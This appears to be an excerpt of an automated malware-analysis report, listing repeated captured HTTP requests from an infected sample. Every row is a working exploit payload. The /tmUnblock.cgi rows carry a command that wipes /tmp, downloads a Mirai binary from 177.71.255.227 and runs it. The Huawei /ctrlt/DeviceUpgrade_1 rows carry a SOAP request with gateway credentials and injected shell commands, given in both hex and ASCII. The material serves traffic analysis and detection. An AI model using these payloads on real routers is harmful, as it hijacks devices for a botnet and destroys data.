| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
